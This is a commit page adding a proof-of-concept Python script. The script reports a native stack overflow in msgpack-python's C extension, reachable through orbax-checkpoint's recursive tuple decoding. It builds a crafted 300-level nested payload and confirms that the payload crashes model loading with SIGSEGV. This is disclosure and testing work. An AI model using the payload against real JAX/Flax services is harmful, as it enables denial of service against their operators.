lexi-core-ai committed on
Commit
bf7ecb5
·
verified ·
1 Parent(s): e8693a8

Upload poc.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc.py +295 -0
poc.py ADDED
@@ -0,0 +1,295 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Stack Buffer Overflow (SIGSEGV) in msgpack-python C Extension
4
+ via Recursive ext_hook — Affects orbax-checkpoint (JAX/Flax Model Loading)
5
+
6
+ Vulnerability:
7
+ msgpack-python's C extension (_cmsgpack) does NOT enforce a recursion depth
8
+ limit when calling user-provided ext_hook callbacks. When an application uses
9
+ a recursive ext_hook (as orbax-checkpoint does for nested tuples), a crafted
10
+ msgpack payload with ~300 nesting levels causes a native stack overflow,
11
+ crashing the process with SIGSEGV.
12
+
13
+ The pure Python fallback is safe (Python's recursion limit catches it),
14
+ but the C extension — which is the DEFAULT — segfaults.
15
+
16
+ Impact:
17
+ - Any JAX/Flax application loading orbax checkpoints is vulnerable
18
+ - A crafted checkpoint file (< 2 KB) crashes the process with SIGSEGV
19
+ - This is a Denial of Service from a crafted model file
20
+ - SIGSEGV means no graceful error handling — the process is killed
21
+
22
+ Affected:
23
+ - msgpack-python (PyPI) — all versions with C extension (tested: 1.1.2)
24
+ - orbax-checkpoint (PyPI) — all versions using msgpack_utils (tested: 0.11.34)
25
+ - File: orbax/checkpoint/msgpack_utils.py, lines 113-116
26
+ - Function: _msgpack_ext_unpack() — recursive ext_hook for TUPLE type
27
+
28
+ Root Cause:
29
+ orbax's _msgpack_ext_unpack (line 113-116) handles TUPLE ExtType by calling
30
+ msgpack.unpackb(data, ext_hook=_msgpack_ext_unpack) recursively. The msgpack
31
+ C extension processes this without any depth limit, so ~300 levels of nesting
32
+ overflow the native call stack → SIGSEGV.
33
+ """
34
+
35
+ import struct
36
+ import sys
37
+ import subprocess
38
+ import tempfile
39
+ import os
40
+
41
# Separator line printed around each test section and the final summary.
BANNER = "=" * 70

# orbax TUPLE ExtType code
TUPLE_EXT_TYPE = 4


def build_nested_tuple_msgpack(depth: int = 300) -> bytes:
    """Build a msgpack payload of ``depth`` nested TUPLE ExtType containers.

    The innermost value is the msgpack encoding of ``[42]``. Each level wraps
    the bytes produced so far in a msgpack ext header, choosing the smallest
    variable-length ext format that can hold the inner length:

        ext8:  0xc7 <size:1>    <type:1> <data>
        ext16: 0xc8 <size:2 BE> <type:1> <data>
        ext32: 0xc9 <size:4 BE> <type:1> <data>

    Args:
        depth: Number of ext wrappers to add around the leaf. ``0`` returns
            the bare leaf.

    Returns:
        The encoded payload.

    Raises:
        ValueError: If ``depth`` is negative.
    """
    if depth < 0:
        raise ValueError(f"depth must be non-negative, got {depth}")

    # Leaf: fixarray(1) = 0x91 holding fixint(42) = 0x2a, i.e. [42]
    data = bytes([0x91, 0x2a])

    for _ in range(depth):
        inner_len = len(data)
        if inner_len <= 0xFF:
            header = struct.pack('>BBB', 0xc7, inner_len, TUPLE_EXT_TYPE)
        elif inner_len <= 0xFFFF:
            header = struct.pack('>BHB', 0xc8, inner_len, TUPLE_EXT_TYPE)
        else:
            header = struct.pack('>BIB', 0xc9, inner_len, TUPLE_EXT_TYPE)
        data = header + data

    return data
75
+
76
+
77
def test_segfault():
    """Unpack the nested payload with a recursive ext_hook in a child process.

    The payload and a small driver script are written into a private
    temporary directory, the script is run with the current interpreter, and
    the child's exit status is inspected. Running in a child keeps a crash
    from taking down this process.

    Returns:
        True if the child was terminated by a signal (SIGSEGV or any other),
        False if it exited on its own.

    Raises:
        subprocess.TimeoutExpired: If the child does not finish within 10 s.
    """
    import signal

    print(BANNER)
    print("TEST: Stack Overflow (SIGSEGV) via Nested TUPLE ExtType")
    print(BANNER)

    depth = 300
    payload = build_nested_tuple_msgpack(depth)
    print(f"[*] Payload size: {len(payload)} bytes ({len(payload)/1024:.1f} KB)")
    print(f"[*] Nesting depth: {depth}")
    print(f"[*] TUPLE ExtType code: {TUPLE_EXT_TYPE}")

    # A private directory is removed on every exit path (including a timeout)
    # and keeps the child's sys.path[0] free of unrelated files.
    with tempfile.TemporaryDirectory() as workdir:
        payload_path = os.path.join(workdir, "payload.msgpack")
        script_path = os.path.join(workdir, "poc_child.py")

        with open(payload_path, "wb") as fh:
            fh.write(payload)

        # The path is embedded with !r so backslashes/quotes stay a valid
        # Python string literal in the generated script.
        poc_script = f'''
import msgpack
import sys

# Simulate orbax's _msgpack_ext_unpack (line 103-116 of msgpack_utils.py)
def _msgpack_ext_unpack(code, data):
    if code == {TUPLE_EXT_TYPE}:  # TUPLE
        return tuple(msgpack.unpackb(data, raw=False, ext_hook=_msgpack_ext_unpack))
    return msgpack.ExtType(code, data)

with open({payload_path!r}, "rb") as f:
    payload = f.read()

print(f"Payload size: {{len(payload)}} bytes", flush=True)
print("Unpacking with recursive ext_hook (simulating orbax)...", flush=True)
result = msgpack.unpackb(payload, raw=False, ext_hook=_msgpack_ext_unpack)
print(f"Result: {{result}}")
'''

        with open(script_path, "w", encoding="utf-8") as fh:
            fh.write(poc_script)

        print(f"\n[*] Running in subprocess (to catch SIGSEGV)...")
        result = subprocess.run(
            [sys.executable, script_path],
            capture_output=True, text=True, timeout=10
        )

    print(f"[*] Exit code: {result.returncode}")
    if result.stdout:
        for line in result.stdout.strip().split('\n'):
            print(f"    {line}")
    # Show the head of stderr so a non-crash failure (e.g. msgpack missing in
    # the child) is distinguishable from a clean run.
    if result.stderr:
        for line in result.stderr.strip().split('\n')[:5]:
            print(f"    stderr: {line}")

    # subprocess reports death-by-signal as a negative return code.
    if result.returncode == -signal.SIGSEGV:
        print(f"\n[!] VULNERABILITY CONFIRMED — SIGSEGV (Segmentation Fault)")
        print(f"    A {len(payload)}-byte msgpack payload crashes the process.")
        print(f"    No graceful error handling — the process is killed by the OS.")
        return True
    if result.returncode < 0:
        sig = -result.returncode
        try:
            sig_name = signal.Signals(sig).name
        except ValueError:
            # Signal number with no named member on this platform.
            sig_name = f"signal {sig}"
        print(f"\n[!] VULNERABILITY CONFIRMED — {sig_name}")
        return True

    print(f"\n[-] No crash (unexpected)")
    return False
146
+
147
+
148
def test_orbax_loading():
    """Feed the nested payload to orbax's ``msgpack_restore`` in a child process.

    The payload and a driver script are written into a private temporary
    directory; the driver imports ``msgpack_restore`` from
    ``orbax.checkpoint.msgpack_utils`` and calls it on the payload bytes.
    The child's exit status decides the result.

    Returns:
        True if the child was terminated by a signal, False otherwise
        (including when the child fails for another reason, such as orbax
        not being importable; see the printed stderr lines).

    Raises:
        subprocess.TimeoutExpired: If the child does not finish within 30 s.
    """
    import signal

    print(f"\n{BANNER}")
    print("TEST: Crash via orbax.checkpoint.msgpack_utils.msgpack_restore()")
    print(BANNER)

    depth = 300
    payload = build_nested_tuple_msgpack(depth)

    # A private directory is removed on every exit path, including a timeout.
    with tempfile.TemporaryDirectory() as workdir:
        payload_path = os.path.join(workdir, "payload.msgpack")
        script_path = os.path.join(workdir, "poc_child.py")

        with open(payload_path, "wb") as fh:
            fh.write(payload)

        # The path is embedded with !r so it is always a valid string literal.
        poc_script = f'''
import sys
sys.stdout.write("Importing orbax...\\n")
sys.stdout.flush()
from orbax.checkpoint.msgpack_utils import msgpack_restore
sys.stdout.write("Calling msgpack_restore() on crafted payload...\\n")
sys.stdout.flush()

with open({payload_path!r}, "rb") as f:
    payload = f.read()

result = msgpack_restore(payload)
sys.stdout.write(f"Result: {{result}}\\n")
'''

        with open(script_path, "w", encoding="utf-8") as fh:
            fh.write(poc_script)

        print(f"[*] Calling orbax.checkpoint.msgpack_utils.msgpack_restore()...")
        result = subprocess.run(
            [sys.executable, script_path],
            capture_output=True, text=True, timeout=30
        )

    print(f"[*] Exit code: {result.returncode}")
    if result.stdout:
        for line in result.stdout.strip().split('\n'):
            print(f"    {line}")
    if result.stderr:
        # Only the first few lines: enough to see an import error or traceback head.
        for line in result.stderr.strip().split('\n')[:5]:
            print(f"    stderr: {line}")

    # subprocess reports death-by-signal as a negative return code.
    if result.returncode == -signal.SIGSEGV:
        print(f"\n[!] CONFIRMED — orbax.msgpack_restore() crashes with SIGSEGV")
        return True
    if result.returncode < 0:
        print(f"\n[!] CONFIRMED — orbax.msgpack_restore() crashes (signal {-result.returncode})")
        return True

    print(f"\n[-] No crash")
    return False
206
+
207
+
208
def test_pure_python_safe():
    """Check that ``msgpack.fallback`` fails gracefully on the nested payload.

    A driver script with the payload embedded as a bytes literal is run in a
    child process. The driver unpacks with ``msgpack.fallback.unpackb`` and a
    recursive ext_hook, and prints a marker line when a Python-level
    exception is raised instead of the process crashing.

    Returns:
        True if the child reported a caught recursion-depth error, False
        otherwise (exit code and the start of stdout are printed).

    Raises:
        subprocess.TimeoutExpired: If the child does not finish within 10 s.
    """
    print(f"\n{BANNER}")
    print("TEST: Pure Python fallback handles this safely")
    print(BANNER)

    depth = 300
    payload = build_nested_tuple_msgpack(depth)

    poc_script = f'''
import msgpack
import msgpack.fallback as fallback

def _msgpack_ext_unpack(code, data):
    if code == {TUPLE_EXT_TYPE}:
        return tuple(fallback.unpackb(data, raw=False, ext_hook=_msgpack_ext_unpack))
    return msgpack.ExtType(code, data)

payload = {payload!r}
try:
    result = fallback.unpackb(payload, raw=False, ext_hook=_msgpack_ext_unpack)
    print(f"Result: {{result}}")
except RecursionError:
    print("RecursionError caught — safe!")
except Exception as e:
    print(f"Error: {{type(e).__name__}}: {{e}}")
'''

    # A private directory is removed on every exit path, including a timeout.
    with tempfile.TemporaryDirectory() as workdir:
        script_path = os.path.join(workdir, "poc_child.py")
        # The script contains a non-ASCII character; Python reads source files
        # as UTF-8 by default, so write it as UTF-8 regardless of locale.
        with open(script_path, "w", encoding="utf-8") as fh:
            fh.write(poc_script)

        result = subprocess.run(
            [sys.executable, script_path],
            capture_output=True, text=True, timeout=10
        )

    # NOTE(review): msgpack.fallback.unpackb appears to translate
    # RecursionError into msgpack's own StackError, which the child reports
    # through its generic "Error: <type>" branch. Treat that as a graceful
    # failure too; confirm against the installed msgpack version.
    handled_gracefully = (
        "RecursionError caught" in result.stdout
        or "Error: StackError" in result.stdout
    )

    if handled_gracefully:
        print(f"[*] Pure Python fallback: RecursionError caught safely")
        print(f"    The C extension is the problem — it bypasses Python's recursion limit")
        return True

    print(f"    Exit code: {result.returncode}")
    print(f"    Output: {result.stdout[:200]}")
    return False
259
+
260
+
261
if __name__ == "__main__":
    # Script entry point: print the environment, run the three checks, then
    # print a summary and the root-cause description.
    print(f"Python: {sys.version}")

    import msgpack
    print(f"msgpack: {'.'.join(map(str, msgpack.version))}")
    print(f"C extension: {hasattr(msgpack, '_cmsgpack')}")

    # Broad catch is deliberate at this top-level boundary: any failure to
    # import orbax (or read its version) means the orbax test cannot run.
    try:
        import orbax.checkpoint
        print(f"orbax-checkpoint: {orbax.checkpoint.__version__}")
        have_orbax = True
    except Exception:
        print("orbax-checkpoint: not installed (PoC still works with plain msgpack)")
        have_orbax = False

    print()

    r1 = test_segfault()
    # Without orbax the child can only fail on import, which would be
    # reported as "NOT VULN"; skip the test and say so instead.
    r2 = test_orbax_loading() if have_orbax else None
    r3 = test_pure_python_safe()

    if r2 is None:
        orbax_status = "SKIPPED (orbax not installed)"
    else:
        orbax_status = "VULN" if r2 else "NOT VULN"

    print(f"\n{BANNER}")
    print("RESULTS")
    print(BANNER)
    print(f"  SIGSEGV (C extension): {'VULN' if r1 else 'NOT VULN'}")
    print(f"  orbax.msgpack_restore(): {orbax_status}")
    print(f"  Pure Python (safe): {'SAFE' if r3 else 'UNKNOWN'}")
    print()
    print("Root cause: msgpack-python C extension (_cmsgpack) has no recursion")
    print("depth limit when calling ext_hook callbacks. orbax-checkpoint uses a")
    print("recursive ext_hook for TUPLE types. A crafted payload with ~300 nested")
    print("TUPLE ExtTypes overflows the native stack → SIGSEGV → process crash.")
    print()
    print("Affected packages:")
    print("  - msgpack (PyPI) — C extension has no depth limit")
    print("  - orbax-checkpoint (PyPI) — recursive ext_hook in msgpack_utils.py")
    print("  - Any JAX/Flax application loading checkpoints via orbax")